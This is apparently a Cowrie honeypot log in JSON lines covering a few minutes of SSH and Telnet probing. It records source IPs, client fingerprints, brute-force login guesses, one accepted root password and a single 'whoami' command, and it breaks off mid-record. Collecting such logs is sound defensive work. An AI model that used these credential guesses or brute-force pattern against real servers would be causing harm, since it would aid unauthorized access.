{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:32:56.108724Z","src_ip":"106.12.128.104","session":"f0d8f076fe2a"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":60744,"dst_ip":"1.2.3.4","dst_port":22,"session":"49c37f024c0d","protocol":"ssh","message":"New connection: 106.12.128.104:60744 (1.2.3.4:22) [session: 49c37f024c0d]","sensor":"my-vps","timestamp":"2025-08-26T22:32:57.109984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:32:57.110964Z","src_ip":"106.12.128.104","session":"49c37f024c0d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:32:57.332133Z","src_ip":"106.12.128.104","session":"49c37f024c0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40844,"dst_ip":"1.2.3.4","dst_port":23,"session":"156b2ef8ea49","protocol":"telnet","message":"New connection: 212.227.125.160:40844 (1.2.3.4:23) [session: 156b2ef8ea49]","sensor":"my-vps","timestamp":"2025-08-26T22:32:59.543457Z"}
{"eventid":"cowrie.session.closed","duration":11.202986240386963,"message":"Connection lost after 11 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:33:10.746364Z","src_ip":"212.227.125.160","session":"156b2ef8ea49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35054,"dst_ip":"1.2.3.4","dst_port":22,"session":"d015bdce7c49","protocol":"ssh","message":"New connection: 212.227.235.229:35054 (1.2.3.4:22) [session: d015bdce7c49]","sensor":"my-vps","timestamp":"2025-08-26T22:33:38.835799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:33:39.190617Z","src_ip":"212.227.235.229","session":"d015bdce7c49"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:33:39.191756Z","src_ip":"212.227.235.229","session":"d015bdce7c49"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"qwerty","message":"login attempt [dspace/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-26T22:33:40.814438Z","src_ip":"212.227.235.229","session":"d015bdce7c49"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:33:42.528945Z","src_ip":"212.227.235.229","session":"d015bdce7c49"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57784,"dst_ip":"1.2.3.4","dst_port":22,"session":"05332d15c768","protocol":"ssh","message":"New connection: 217.72.205.35:57784 (1.2.3.4:22) [session: 05332d15c768]","sensor":"my-vps","timestamp":"2025-08-26T22:33:46.552084Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:33:46.553791Z","src_ip":"217.72.205.35","session":"05332d15c768"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":38620,"dst_ip":"1.2.3.4","dst_port":22,"session":"97d45a9405c8","protocol":"ssh","message":"New connection: 93.123.109.189:38620 (1.2.3.4:22) [session: 97d45a9405c8]","sensor":"my-vps","timestamp":"2025-08-26T22:33:48.718984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:33:48.720071Z","src_ip":"93.123.109.189","session":"97d45a9405c8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T22:33:48.739562Z","src_ip":"93.123.109.189","session":"97d45a9405c8"}
{"eventid":"cowrie.login.failed","username":"solv","password":"solv","message":"login attempt [solv/solv] failed","sensor":"my-vps","timestamp":"2025-08-26T22:33:48.799071Z","src_ip":"93.123.109.189","session":"97d45a9405c8"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:33:49.820990Z","src_ip":"93.123.109.189","session":"97d45a9405c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59015,"dst_ip":"1.2.3.4","dst_port":23,"session":"7fb6512c4461","protocol":"telnet","message":"New connection: 212.227.235.229:59015 (1.2.3.4:23) [session: 7fb6512c4461]","sensor":"my-vps","timestamp":"2025-08-26T22:33:56.307574Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:34:00.543225Z","src_ip":"212.227.235.229","session":"875a860ccc2e"}
{"eventid":"cowrie.session.closed","duration":13.512973546981812,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:34:09.820479Z","src_ip":"212.227.235.229","session":"7fb6512c4461"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:34:57.117273Z","src_ip":"106.12.128.104","session":"49c37f024c0d"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":46572,"dst_ip":"1.2.3.4","dst_port":22,"session":"2edc750a33ac","protocol":"ssh","message":"New connection: 106.12.128.104:46572 (1.2.3.4:22) [session: 2edc750a33ac]","sensor":"my-vps","timestamp":"2025-08-26T22:34:57.901335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:34:57.902265Z","src_ip":"106.12.128.104","session":"2edc750a33ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48398,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6fca63d9174","protocol":"ssh","message":"New connection: 212.227.235.229:48398 (1.2.3.4:22) [session: d6fca63d9174]","sensor":"my-vps","timestamp":"2025-08-26T22:36:04.608573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:36:05.521831Z","src_ip":"212.227.235.229","session":"d6fca63d9174"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:36:05.522897Z","src_ip":"212.227.235.229","session":"d6fca63d9174"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37299,"dst_ip":"1.2.3.4","dst_port":23,"session":"8b40bfd84979","protocol":"telnet","message":"New connection: 212.227.125.160:37299 (1.2.3.4:23) [session: 8b40bfd84979]","sensor":"my-vps","timestamp":"2025-08-26T22:36:08.576734Z"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"wasd","message":"login attempt [dspace/wasd] failed","sensor":"my-vps","timestamp":"2025-08-26T22:36:09.919543Z","src_ip":"212.227.235.229","session":"d6fca63d9174"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:36:11.898751Z","src_ip":"212.227.235.229","session":"d6fca63d9174"}
{"eventid":"cowrie.session.closed","duration":37.38905310630798,"message":"Connection lost after 37 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:36:45.965655Z","src_ip":"212.227.125.160","session":"8b40bfd84979"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":38220,"dst_ip":"1.2.3.4","dst_port":22,"session":"94e15ca97ec2","protocol":"ssh","message":"New connection: 106.12.128.104:38220 (1.2.3.4:22) [session: 94e15ca97ec2]","sensor":"my-vps","timestamp":"2025-08-26T22:36:57.800767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:36:57.802298Z","src_ip":"106.12.128.104","session":"94e15ca97ec2"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:36:57.903272Z","src_ip":"106.12.128.104","session":"2edc750a33ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:36:58.012058Z","src_ip":"106.12.128.104","session":"94e15ca97ec2"}
{"eventid":"cowrie.login.failed","username":"rke","password":"123456","message":"login attempt [rke/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:36:59.389396Z","src_ip":"106.12.128.104","session":"94e15ca97ec2"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:37:04.898559Z","src_ip":"106.12.128.104","session":"94e15ca97ec2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41462,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d612aef26a3","protocol":"ssh","message":"New connection: 212.227.235.229:41462 (1.2.3.4:22) [session: 1d612aef26a3]","sensor":"my-vps","timestamp":"2025-08-26T22:37:08.204596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:37:08.205756Z","src_ip":"212.227.235.229","session":"1d612aef26a3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:37:08.378592Z","src_ip":"212.227.235.229","session":"1d612aef26a3"}
{"eventid":"cowrie.login.success","username":"root","password":"1qw23er45ty6","message":"login attempt [root/1qw23er45ty6] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:37:08.897624Z","src_ip":"212.227.235.229","session":"1d612aef26a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:37:09.308184Z","src_ip":"212.227.235.229","session":"1d612aef26a3"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T22:37:09.308976Z","src_ip":"212.227.235.229","session":"1d612aef26a3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:37:09.481686Z","src_ip":"212.227.235.229","session":"1d612aef26a3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:37:09.482868Z","src_ip":"212.227.235.229","session":"1d612aef26a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34312,"dst_ip":"1.2.3.4","dst_port":22,"session":"50cc3642355a","protocol":"ssh","message":"New connection: 212.227.235.229:34312 (1.2.3.4:22) [session: 50cc3642355a]","sensor":"my-vps","timestamp":"2025-08-26T22:38:40.639551Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:38:41.642164Z","src_ip":"212.227.235.229","session":"50cc3642355a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:38:41.643275Z","src_ip":"212.227.235.229","session":"50cc3642355a"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"654321","message":"login attempt [dspace/654321] failed","sensor":"my-vps","timestamp":"2025-08-26T22:38:47.061724Z","src_ip":"212.227.235.229","session":"50cc3642355a"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:38:49.636008Z","src_ip":"212.227.235.229","session":"50cc3642355a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59510,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4817679394c","protocol":"ssh","message":"New connection: 217.72.205.35:59510 (1.2.3.4:22) [session: a4817679394c]","sensor":"my-vps","timestamp":"2025-08-26T22:40:30.522056Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:40:30.523279Z","src_ip":"217.72.205.35","session":"a4817679394c"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":33316,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7f34e56efd0","protocol":"ssh","message":"New connection: 106.12.128.104:33316 (1.2.3.4:22) [session: f7f34e56efd0]","sensor":"my-vps","timestamp":"2025-08-26T22:40:56.284183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:40:56.285103Z","src_ip":"106.12.128.104","session":"f7f34e56efd0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:40:59.317786Z","src_ip":"106.12.128.104","session":"f7f34e56efd0"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:41:02.080168Z","src_ip":"106.12.128.104","session":"f7f34e56efd0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49366,"dst_ip":"1.2.3.4","dst_port":22,"session":"f181ab637534","protocol":"ssh","message":"New connection: 212.227.235.229:49366 (1.2.3.4:22) [session: f181ab637534]","sensor":"my-vps","timestamp":"2025-08-26T22:41:08.432726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:41:08.452433Z","src_ip":"212.227.235.229","session":"f181ab637534"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-